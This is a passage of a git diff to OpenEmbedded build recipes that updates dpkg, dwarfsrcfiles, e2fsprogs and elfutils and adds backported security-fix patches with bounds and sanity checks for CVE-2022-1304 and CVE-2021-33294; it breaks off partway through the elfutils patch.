+++ b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
@@ -18,5 +18,5 @@ SRC_URI_append_class-native = " \
18 file://tweak-options-require-tar-1.27.patch \ 18 file://tweak-options-require-tar-1.27.patch \
19" 19"
20 20
21SRC_URI[md5sum] = "60f57c5494e6dfa177504d47bfa0e383" 21SRC_URI[md5sum] = "9d170c8baa1aa36b09698c909f304508"
22SRC_URI[sha256sum] = "4c27fededf620c0aa522fff1a48577ba08144445341257502e7730f2b1a296e8" 22SRC_URI[sha256sum] = "2632c00b0cf0ea19ed7bd6700e6ec5faca93f0045af629d356dc03ad74ae6f10"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
index 2c843a9342..56b52d6a47 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
+++ b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
@@ -1,4 +1,5 @@
1SUMMARY = "A small utility for printing debug source file locations embedded in binaries" 1SUMMARY = "A small utility for printing debug source file locations embedded in binaries"
2DESCRIPTION = "${SUMMARY}"
2LICENSE = "GPLv2+" 3LICENSE = "GPLv2+"
3LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8" 4LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8"
4 5
diff --git a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
index af7af524eb..9eb5ca807a 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
+++ b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
@@ -9,6 +9,7 @@
9 9
10#include <argp.h> 10#include <argp.h>
11#include <stdio.h> 11#include <stdio.h>
12#include <stdlib.h>
12 13
13#include <dwarf.h> 14#include <dwarf.h>
14#include <elfutils/libdw.h> 15#include <elfutils/libdw.h>
@@ -83,13 +84,15 @@ process_cu (Dwarf_Die *cu_die)
83int 84int
84main (int argc, char **argv) 85main (int argc, char **argv)
85{ 86{
86 char* args[3]; 87 char* args[5];
87 int res = 0; 88 int res = 0;
88 Dwfl *dwfl; 89 Dwfl *dwfl;
89 Dwarf_Addr bias; 90 Dwarf_Addr bias;
90 91
91 if (argc != 2) 92 if (argc != 2) {
92 fprintf(stderr, "Usage %s <file>", argv[0]); 93 fprintf(stderr, "Usage %s <file>", argv[0]);
94 exit(EXIT_FAILURE);
95 }
93 96
94 // Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard 97 // Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard
95 // dwfl argp parser to open the file for us and get our Dwfl. Useful 98 // dwfl argp parser to open the file for us and get our Dwfl. Useful
@@ -98,8 +101,12 @@ main (int argc, char **argv)
98 args[0] = argv[0]; 101 args[0] = argv[0];
99 args[1] = "-e"; 102 args[1] = "-e";
100 args[2] = argv[1]; 103 args[2] = argv[1];
104 // We don't want to follow debug linked files due to the way OE processes
105 // files, could race against changes in the linked binary (e.g. objcopy on it)
106 args[3] = "--debuginfo-path";
107 args[4] = "/not/exist";
101 108
102 argp_parse (dwfl_standard_argp (), 3, args, 0, NULL, &dwfl); 109 argp_parse (dwfl_standard_argp (), 5, args, 0, NULL, &dwfl);
103 110
104 Dwarf_Die *cu = NULL; 111 Dwarf_Die *cu = NULL;
105 while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL) 112 while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL)
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 009f5ed807..57e4665a34 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "The Ext2 Filesystem Utilities (e2fsprogs) contain all of the stan
3fixing, configuring , and debugging ext2 filesystems." 3fixing, configuring , and debugging ext2 filesystems."
4HOMEPAGE = "http://e2fsprogs.sourceforge.net/" 4HOMEPAGE = "http://e2fsprogs.sourceforge.net/"
5 5
6LICENSE = "GPLv2 & LGPLv2 & BSD & MIT" 6LICENSE = "GPLv2 & LGPLv2 & BSD-3-Clause & MIT"
7LICENSE_e2fsprogs-dumpe2fs = "GPLv2" 7LICENSE_e2fsprogs-dumpe2fs = "GPLv2"
8LICENSE_e2fsprogs-e2fsck = "GPLv2" 8LICENSE_e2fsprogs-e2fsck = "GPLv2"
9LICENSE_e2fsprogs-mke2fs = "GPLv2" 9LICENSE_e2fsprogs-mke2fs = "GPLv2"
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
19SECTION = "base" 19SECTION = "base"
20DEPENDS = "util-linux attr" 20DEPENDS = "util-linux attr"
21 21
22SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git" 22SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
23S = "${WORKDIR}/git" 23S = "${WORKDIR}/git"
24 24
25inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest 25inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
deleted file mode 100644
index ba4e3a3c97..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
+++ /dev/null
@@ -1,49 +0,0 @@
1From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001
2From: Theodore Ts'o <tytso@mit.edu>
3Date: Thu, 19 Dec 2019 19:45:06 -0500
4Subject: [PATCH] e2fsck: don't try to rehash a deleted directory
5
6If directory has been deleted in pass1[bcd] processing, then we
7shouldn't try to rehash the directory in pass 3a when we try to
8rehash/reoptimize directories.
9
10Signed-off-by: Theodore Ts'o <tytso@mit.edu>
11
12Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3]
13Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
14---
15 e2fsck/pass1b.c | 4 ++++
16 e2fsck/rehash.c | 2 ++
17 2 files changed, 6 insertions(+)
18
19diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c
20index 5693b9cf..bca701ca 100644
21--- a/e2fsck/pass1b.c
22+++ b/e2fsck/pass1b.c
23@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino,
24 fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx);
25 if (ctx->inode_bad_map)
26 ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino);
27+ if (ctx->inode_reg_map)
28+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino);
29+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino);
30+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino);
31 ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode));
32 quota_data_sub(ctx->qctx, &dp->inode, ino,
33 pb.dup_blocks * fs->blocksize);
34diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
35index 3dd1e941..2c908be0 100644
36--- a/e2fsck/rehash.c
37+++ b/e2fsck/rehash.c
38@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx)
39 if (!ext2fs_u32_list_iterate(iter, &ino))
40 break;
41 }
42+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino))
43+ continue;
44
45 pctx.dir = ino;
46 if (first) {
47--
482.24.1
49
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
deleted file mode 100644
index fc4a540986..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
+++ /dev/null
@@ -1,41 +0,0 @@
1From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001
2From: Robert Yang <liezhi.yang@windriver.com>
3Date: Wed, 13 Sep 2017 19:55:35 -0700
4Subject: [PATCH] misc/create_inode.c: set dir's mode correctly
5
6The dir's mode has been set by ext2fs_mkdir() with umask, so
7reset it to the source's mode in set_inode_extra().
8
9Fixed when source dir's mode is 521, but tarball would be 721, this was
10incorrect.
11
12Upstream-Status: Submitted
13
14Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
15---
16 misc/create_inode.c | 9 ++++++++-
17 1 file changed, 8 insertions(+), 1 deletion(-)
18
19diff --git a/misc/create_inode.c b/misc/create_inode.c
20index 8ce3faf..50fbaa8 100644
21--- a/misc/create_inode.c
22+++ b/misc/create_inode.c
23@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino,
24
25 inode.i_uid = st->st_uid;
26 inode.i_gid = st->st_gid;
27- inode.i_mode |= st->st_mode;
28+ /*
29+ * The dir's mode has been set by ext2fs_mkdir() with umask, so
30+ * reset it to the source's mode
31+ */
32+ if S_ISDIR(st->st_mode)
33+ inode.i_mode = LINUX_S_IFDIR | st->st_mode;
34+ else
35+ inode.i_mode |= st->st_mode;
36 inode.i_atime = st->st_atime;
37 inode.i_mtime = st->st_mtime;
38 inode.i_ctime = st->st_ctime;
39--
402.10.2
41
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
deleted file mode 100644
index de4bce0037..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
+++ /dev/null
@@ -1,57 +0,0 @@
1From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001
2From: Theodore Ts'o <tytso@mit.edu>
3Date: Thu, 19 Dec 2019 19:37:34 -0500
4Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when
5 rehashing
6
7In e2fsck pass 3a, when we are rehashing directories, at least in
8theory, all of the directories should have had corruptions with
9respect to directory entry structure fixed. However, it's possible
10(for example, if the user declined a fix) that we can reach this stage
11of processing with a corrupted directory entries.
12
13So check for that case and don't try to process a corrupted directory
14block so we don't run into trouble in mutate_name() if there is a
15zero-length file name.
16
17Addresses: TALOS-2019-0973
18Addresses: CVE-2019-5188
19Signed-off-by: Theodore Ts'o <tytso@mit.edu>
20
21CVE: CVE-2019-5188
22Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
23Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff]
24---
25 e2fsck/rehash.c | 9 +++++++++
26 1 file changed, 9 insertions(+)
27
28diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
29index a5fc1be1..3dd1e941 100644
30--- a/e2fsck/rehash.c
31+++ b/e2fsck/rehash.c
32@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs,
33 dir_offset += rec_len;
34 if (dirent->inode == 0)
35 continue;
36+ if ((name_len) == 0) {
37+ fd->err = EXT2_ET_DIR_CORRUPTED;
38+ return BLOCK_ABORT;
39+ }
40 if (!fd->compress && (name_len == 1) &&
41 (dirent->name[0] == '.'))
42 continue;
43@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs,
44 continue;
45 }
46 new_len = ext2fs_dirent_name_len(ent->dir);
47+ if (new_len == 0) {
48+ /* should never happen */
49+ ext2fs_unmark_valid(fs);
50+ continue;
51+ }
52 memcpy(new_name, ent->dir->name, new_len);
53 mutate_name(new_name, &new_len);
54 for (j=0; j < fd->num_array; j++) {
55--
562.24.1
57
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
new file mode 100644
index 0000000000..34e2567b25
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
@@ -0,0 +1,42 @@
1From a66071ed6a0d1fa666d22dcb78fa6fcb3bf22df3 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 27 May 2022 14:01:50 +0530
4Subject: [PATCH] CVE-2022-1304
5
6Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?h=maint&id=ab51d587bb9b229b1fade1afd02e1574c1ba5c76]
7CVE: CVE-2022-1304
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10---
11 lib/ext2fs/extent.c | 8 ++++++++
12 1 file changed, 8 insertions(+)
13
14diff --git a/lib/ext2fs/extent.c b/lib/ext2fs/extent.c
15index ac3dbfec9..a1b1905cd 100644
16--- a/lib/ext2fs/extent.c
17+++ b/lib/ext2fs/extent.c
18@@ -495,6 +495,10 @@ retry:
19 ext2fs_le16_to_cpu(eh->eh_entries);
20 newpath->max_entries = ext2fs_le16_to_cpu(eh->eh_max);
21
22+ /* Make sure there is at least one extent present */
23+ if (newpath->left <= 0)
24+ return EXT2_ET_EXTENT_NO_DOWN;
25+
26 if (path->left > 0) {
27 ix++;
28 newpath->end_blk = ext2fs_le32_to_cpu(ix->ei_block);
29@@ -1630,6 +1634,10 @@ errcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)
30
31 cp = path->curr;
32
33+ /* Sanity check before memmove() */
34+ if (path->left < 0)
35+ return EXT2_ET_EXTENT_LEAF_BAD;
36+
37 if (path->left) {
38 memmove(cp, cp + sizeof(struct ext3_extent_idx),
39 path->left * sizeof(struct ext3_extent_idx));
40--
412.25.1
42
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 0000000000..caeb560d32
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
1Ensure "small" file systems also have the default inode size (256 bytes) so that
2can store 64-bit timestamps and work past 2038.
3
4The "small" type is any size >3MB and <512MB, which covers a lot of relatively
5small filesystems built by OE, especially when they're sized to fit the contents
6and expand to the storage on boot.
7
8Upstream-Status: Inappropriate
9Signed-off-by: Ross Burton <ross.burton@arm.com>
10
11diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
12index 01e35cf8..29f41dc0 100644
13--- a/misc/mke2fs.conf.in
14+++ b/misc/mke2fs.conf.in
15@@ -16,7 +16,6 @@
16 }
17 small = {
18 blocksize = 1024
19- inode_size = 128
20 inode_ratio = 4096
21 }
22 floppy = {
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
deleted file mode 100644
index 342a2b855b..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
+++ /dev/null
@@ -1,76 +0,0 @@
1From: Wang Shilong <wshilong@ddn.com>
2Date: Mon, 30 Dec 2019 19:52:39 -0500
3Subject: e2fsck: fix use after free in calculate_tree()
4
5The problem is alloc_blocks() will call get_next_block() which might
6reallocate outdir->buf, and memory address could be changed after
7this. To fix this, pointers that point into outdir->buf, such as
8int_limit and root need to be recaulated based on the new starting
9address of outdir->buf.
10
11[ Changed to correctly recalculate int_limit, and to optimize how we
12 reallocate outdir->buf. -TYT ]
13
14Addresses-Debian-Bug: 948517
15Signed-off-by: Wang Shilong <wshilong@ddn.com>
16Signed-off-by: Theodore Ts'o <tytso@mit.edu>
17(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01)
18
19Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
20Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01]
21---
22 e2fsck/rehash.c | 17 ++++++++++++++++-
23 1 file changed, 16 insertions(+), 1 deletion(-)
24
25diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
26index 0a5888a9..2574e151 100644
27--- a/e2fsck/rehash.c
28+++ b/e2fsck/rehash.c
29@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir,
30 errcode_t retval;
31
32 if (outdir->num >= outdir->max) {
33- retval = alloc_size_dir(fs, outdir, outdir->max + 50);
34+ int increment = outdir->max / 10;
35+
36+ if (increment < 50)
37+ increment = 50;
38+ retval = alloc_size_dir(fs, outdir, outdir->max + increment);
39 if (retval)
40 return retval;
41 }
42@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs,
43 if (retval)
44 return retval;
45
46+ /* outdir->buf might be reallocated */
47+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset);
48+
49 *next_ent = set_int_node(fs, block_start);
50 *limit = (struct ext2_dx_countlimit *)(*next_ent);
51 if (next_offset)
52@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs,
53 return retval;
54 }
55 if (c3 == 0) {
56+ int delta1 = (char *)int_limit - outdir->buf;
57+ int delta2 = (char *)root - outdir->buf;
58+
59 retval = alloc_blocks(fs, &limit, &int_ent,
60 &dx_ent, &int_offset,
61 NULL, outdir, i, &c2,
62@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs,
63 if (retval)
64 return retval;
65
66+ /* outdir->buf might be reallocated */
67+ int_limit = (struct ext2_dx_countlimit *)
68+ (outdir->buf + delta1);
69+ root = (struct ext2_dx_entry *)
70+ (outdir->buf + delta2);
71 }
72 dx_ent->block = ext2fs_cpu_to_le32(i);
73 if (c3 != limit->limit)
74--
752.24.1
76
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
index 4d335af4cf..284ac90196 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
@@ -1,4 +1,4 @@
1From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001 1From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001
2From: Jackie Huang <jackie.huang@windriver.com> 2From: Jackie Huang <jackie.huang@windriver.com>
3Date: Wed, 10 Aug 2016 11:19:44 +0800 3Date: Wed, 10 Aug 2016 11:19:44 +0800
4Subject: [PATCH] Fix missing check for permission denied. 4Subject: [PATCH] Fix missing check for permission denied.
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
index 95e6a7a2d5..aac88eed98 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
@@ -1,4 +1,4 @@
1From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001 1From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001
2From: Ross Burton <ross.burton@intel.com> 2From: Ross Burton <ross.burton@intel.com>
3Date: Mon, 23 Dec 2013 13:38:34 +0000 3Date: Mon, 23 Dec 2013 13:38:34 +0000
4Subject: [PATCH] e2fsprogs: silence debugfs 4Subject: [PATCH] e2fsprogs: silence debugfs
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
index c97c0377e9..279923db8e 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
@@ -8,3 +8,4 @@ rm -f *.tmp
8rm -f *.ok 8rm -f *.ok
9rm -f *.failed 9rm -f *.failed
10rm -f *.log 10rm -f *.log
11cp ../data/test_data.tmp ./
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
index 439928e433..565c433866 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
@@ -4,19 +4,17 @@ SRC_URI += "file://remove.ldconfig.call.patch \
4 file://run-ptest \ 4 file://run-ptest \
5 file://ptest.patch \ 5 file://ptest.patch \
6 file://mkdir_p.patch \ 6 file://mkdir_p.patch \
7 file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \
8 file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \ 7 file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \
9 file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \ 8 file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \
10 file://CVE-2019-5188.patch \ 9 file://CVE-2022-1304.patch \
11 file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \
12 file://e2fsck-fix-use-after-free-in-calculate_tree.patch \
13 " 10 "
14 11
15SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \ 12SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
16 file://quiet-debugfs.patch \ 13 file://quiet-debugfs.patch \
14 file://big-inodes-for-small-fs.patch \
17" 15"
18 16
19SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac" 17SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f"
20UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$" 18UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$"
21 19
22EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \ 20EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \
@@ -56,6 +54,7 @@ do_install () {
56 oe_multilib_header ext2fs/ext2_types.h 54 oe_multilib_header ext2fs/ext2_types.h
57 install -d ${D}${base_bindir} 55 install -d ${D}${base_bindir}
58 mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs 56 mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs
57 mv ${D}${bindir}/lsattr ${D}${base_bindir}/lsattr.e2fsprogs
59 58
60 install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/ 59 install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/
61 60
@@ -104,10 +103,12 @@ FILES_libe2p = "${base_libdir}/libe2p.so.*"
104FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*" 103FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*"
105FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds" 104FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds"
106 105
107ALTERNATIVE_${PN} = "chattr" 106ALTERNATIVE_${PN} = "chattr lsattr"
108ALTERNATIVE_PRIORITY = "100" 107ALTERNATIVE_PRIORITY = "100"
109ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr" 108ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr"
110ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs" 109ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs"
110ALTERNATIVE_LINK_NAME[lsattr] = "${base_bindir}/lsattr"
111ALTERNATIVE_TARGET[lsattr] = "${base_bindir}/lsattr.e2fsprogs"
111 112
112ALTERNATIVE_${PN}-doc = "fsck.8" 113ALTERNATIVE_${PN}-doc = "fsck.8"
113ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8" 114ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8"
@@ -143,4 +144,7 @@ do_install_ptest() {
143 144
144 install -d ${D}${PTEST_PATH}/lib 145 install -d ${D}${PTEST_PATH}/lib
145 install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/ 146 install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/
147
148 install -d ${D}${PTEST_PATH}/data
149 install -m 0644 ${B}/tests/test_data.tmp ${D}${PTEST_PATH}/data/
146} 150}
diff --git a/meta/recipes-devtools/elfutils/elfutils_0.178.bb b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
index c500ae3c19..29a3bbfffb 100644
--- a/meta/recipes-devtools/elfutils/elfutils_0.178.bb
+++ b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Utilities and libraries for handling compiled object files" 1SUMMARY = "Utilities and libraries for handling compiled object files"
2HOMEPAGE = "https://sourceware.org/elfutils" 2HOMEPAGE = "https://sourceware.org/elfutils"
3DESCRIPTION = "elfutils is a collection of utilities and libraries to read, create and modify ELF binary files, find and handle DWARF debug data, symbols, thread state and stacktraces for processes and core files on GNU/Linux."
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2 & LGPLv3+ & GPLv3+" 5LICENSE = "GPLv2 & LGPLv3+ & GPLv3+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 6LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -33,6 +34,7 @@ SRC_URI = "https://sourceware.org/elfutils/ftp/${PV}/${BP}.tar.bz2 \
33 file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \ 34 file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \
34 file://run-ptest \ 35 file://run-ptest \
35 file://ptest.patch \ 36 file://ptest.patch \
37 file://CVE-2021-33294.patch \
36 " 38 "
37SRC_URI_append_libc-musl = " \ 39SRC_URI_append_libc-musl = " \
38 file://0001-musl-obstack-fts.patch \ 40 file://0001-musl-obstack-fts.patch \
diff --git a/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
new file mode 100644
index 0000000000..0500a4cf83
--- /dev/null
+++ b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
@@ -0,0 +1,72 @@
1From 480b6fa3662ba8ffeee274bf0d37423413c01e55 Mon Sep 17 00:00:00 2001
2From: Mark Wielaard <mark@klomp.org>
3Date: Wed, 3 Mar 2021 21:40:53 +0100
4Subject: [PATCH] readelf: Sanity check verneed and verdef offsets in handle_symtab.
5
6We are going through vna_next, vn_next and vd_next in a while loop.
7Make sure that all offsets are sane. We don't want things to wrap
8around so we go in cycles.
9
10https://sourceware.org/bugzilla/show_bug.cgi?id=27501
11
12Signed-off-by: Mark Wielaard <mark@klomp.org>
13
14Upstream-Status: Backport [https://sourceware.org/git/?p=elfutils.git;a=commit;h=480b6fa3662ba8ffeee274bf0d37423413c01e55]
15CVE: CVE-2021-33294
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 src/ChangeLog | 5 +++++
19 src/readelf.c | 10 +++++++++-
20 2 files changed, 14 insertions(+), 1 deletion(-)
21
22diff --git a/src/ChangeLog b/src/ChangeLog
23index 6af977e..f0d9e39 100644
24--- a/src/ChangeLog
25+++ b/src/ChangeLog
26@@ -1,3 +1,8 @@
27+2021-03-03 Mark Wielaard <mark@klomp.org>
28+
29+ * readelf.c (handle_symtab): Sanity check verneed vna_next,
30+ vn_next and verdef vd_next offsets.
31+
32 2019-11-26 Mark Wielaard <mark@klomp.org>
33
34 * Makefile.am (BUILD_STATIC): Add libraries needed for libdw.
35diff --git a/src/readelf.c b/src/readelf.c
36index 5994615..ab7a1c1 100644
37--- a/src/readelf.c
38+++ b/src/readelf.c
39@@ -2550,7 +2550,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
40 &vernaux_mem);
41 while (vernaux != NULL
42 && vernaux->vna_other != *versym
43- && vernaux->vna_next != 0)
44+ && vernaux->vna_next != 0
45+ && (verneed_data->d_size - vna_offset
46+ >= vernaux->vna_next))
47 {
48 /* Update the offset. */
49 vna_offset += vernaux->vna_next;
